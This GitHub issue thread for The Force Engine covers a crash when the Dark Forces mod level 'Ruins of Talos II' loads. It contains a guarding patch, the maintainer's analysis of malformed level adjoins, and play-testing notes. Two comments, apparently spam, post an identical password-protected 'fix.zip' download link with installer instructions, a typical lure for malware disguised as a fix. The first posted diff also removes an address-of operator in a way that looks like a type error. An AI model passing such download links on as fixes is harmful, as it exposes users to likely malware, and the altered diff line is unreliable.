### ISSUE TITLE
[Crash] Ruins of Talos II: Phantom Point Crashes on load

### ISSUE THREAD

**Issue by DatMaxNub** [luciusDXL/TheForceEngine#443]
Version: 1.10

Game: Dark Forces

Mod: https://df-21.net/downloads/missions.php?viewid=2086487251

Level crashes TFE at the load screen.

[crashdump.dmp](https://github.com/user-attachments/files/16743871/crashdump.dmp)

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mlauss2** [comment]
This patch fixes it for me, but I have absolutely no idea whether it's the right thing to do.
The level loads, but I haven't played it yet.

```diff --git a/TheForceEngine/TFE_Jedi/Level/level.cpp b/TheForceEngine/TFE_Jedi/Level/level.cpp
index 855739e2..3a90ea08 100644
--- a/TheForceEngine/TFE_Jedi/Level/level.cpp
+++ b/TheForceEngine/TFE_Jedi/Level/level.cpp
@@ -103,14 +103,20 @@ namespace TFE_Jedi
                        for (s32 w = 0; w < sector->wallCount; w++, wall++)
                        {
                                RSector* nextSector = wall->nextSector;
-                               if (nextSector)
+                               if (nextSector && nextSector->walls && wall->mirror != -1 && nextSector->wallCount > wall->mirror)
                                {
-                                       RWall* mirror = &nextSector->walls[wall->mirror];
+                                       RWall* mirror = nextSector->walls[wall->mirror];
                                        wall->mirrorWall = mirror;
                                        // Both sides of a mirror should have the same lower flags3 (such as walkability).
                                        wall->flags3 |= (mirror->flags3 & 0x0f);
                                        mirror->flags3 |= (wall->flags3 & 0x0f);
                                }
+                               else
+                               {
+                                       // disable invalid mirror
+                                       wall->nextSector = nullptr;
+                                       wall->mirror = -1;
+                               }
                        }
                        sector_setupWallDrawFlags(sector);
                        sector_adjustHeights(sector, 0, 0, 0);


```

**Comment by luciusDXL** [comment]
Thanks for the report, I will look at the data. But if the above fixes it, it is probably an issue with the level data (another case where it should crash in DOS but doesn't for some reason).

**Comment by luciusDXL** [comment]
@DatMaxNub So I looked at the level in the editor - there is an area with a waterfall with some really wonky adjoins - I'm surprised it works in vanilla, honestly.

![tfe_screenshot_Mon-Aug-26-11_09_21-2024_1](https://github.com/user-attachments/assets/5461a888-fb7a-4223-b2ff-5be3a51bd161)

For example, see that highlight adjoin - you have 3 adjoins in that spot, if it were correctly setup, the adjoin would only extend along the length of the step.

Here you can see the sector in question is degenerate, part of the reason the adjoins are so wonky:
![tfe_screenshot_Mon-Aug-26-11_09_21-2024_2](https://github.com/user-attachments/assets/f0ba6844-98c9-4e38-9bf5-491b5e0802c9)

Anyway, the only real fix (other than fixing the level itself) is something like what @mlauss2 has. I will add something here for the next release.

**Comment by DatMaxNub** [comment]
> This patch fixes it for me, but I have absolutely no idea whether it's the right thing to do. The level loads, but I haven't played it to completion yet.
> 
> ```diff
> index 855739e2..57738f3d 100644
> --- a/TheForceEngine/TFE_Jedi/Level/level.cpp
> +++ b/TheForceEngine/TFE_Jedi/Level/level.cpp
> @@ -103,7 +103,7 @@ namespace TFE_Jedi
>                         for (s32 w = 0; w < sector->wallCount; w++, wall++)
>                         {
>                                 RSector* nextSector = wall->nextSector;
> -                               if (nextSector)
> +                               if (nextSector && nextSector->walls && wall->mirror != -1 && nextSector->wallCount > wall->mirror)
>                                 {
>                                         RWall* mirror = &nextSector->walls[wall->mirror];
>                                         wall->mirrorWall = mirror;
> @@ -111,6 +111,12 @@ namespace TFE_Jedi
>                                         wall->flags3 |= (mirror->flags3 & 0x0f);
>                                         mirror->flags3 |= (wall->flags3 & 0x0f);
>                                 }
> +                               else
> +                               {
> +                                       // disable invalid/nonsensical mirror
> +                                       wall->nextSector = nullptr;
> +                                       wall->mirror = -1;
> +                               }
>                         }
>                         sector_setupWallDrawFlags(sector);
>                         sector_adjustHeights(sector, 0, 0, 0);
> ```
> 
> EDIT: I was able to complete the level with this patch applied. There's a wall in the underground mining shaft one has to step through, shortly before the big wampa outside behind a bush blocking the way, is that intentional? The automap revealed the way forward, so it wasn't an issue.
> 
> here: ![image](https://private-user-images.githubusercontent.com/123231678/361533540-48a045c1-8b74-4c0e-9870-1864f4a7bed9.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjUzMDUzMDgsIm5iZiI6MTcyNTMwNTAwOCwicGF0aCI6Ii8xMjMyMzE2NzgvMzYxNTMzNTQwLTQ4YTA0NWMxLThiNzQtNGMwZS05ODcwLTE4NjRmNGE3YmVkOS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwOTAyJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDkwMlQxOTIzMjhaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT05NmU4ZTI0ZmYyMjVhODM0ZWU2OTBhODBmN2ZiMDM4NzY0YzA3NmFmNWQyMzBlM2QzNTc3ZWIxOWFlNDQzMGM5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.K7ubMNkBPSDaBT-F_JgcECkTrHMsol8LjB6luotgrUw)

Yes cutting the brush was intentional. It's meant to loop you back to cabin with a red key hidden behind the fireplace

https://www.youtube.com/watch?v=bnpGiYPpWbY
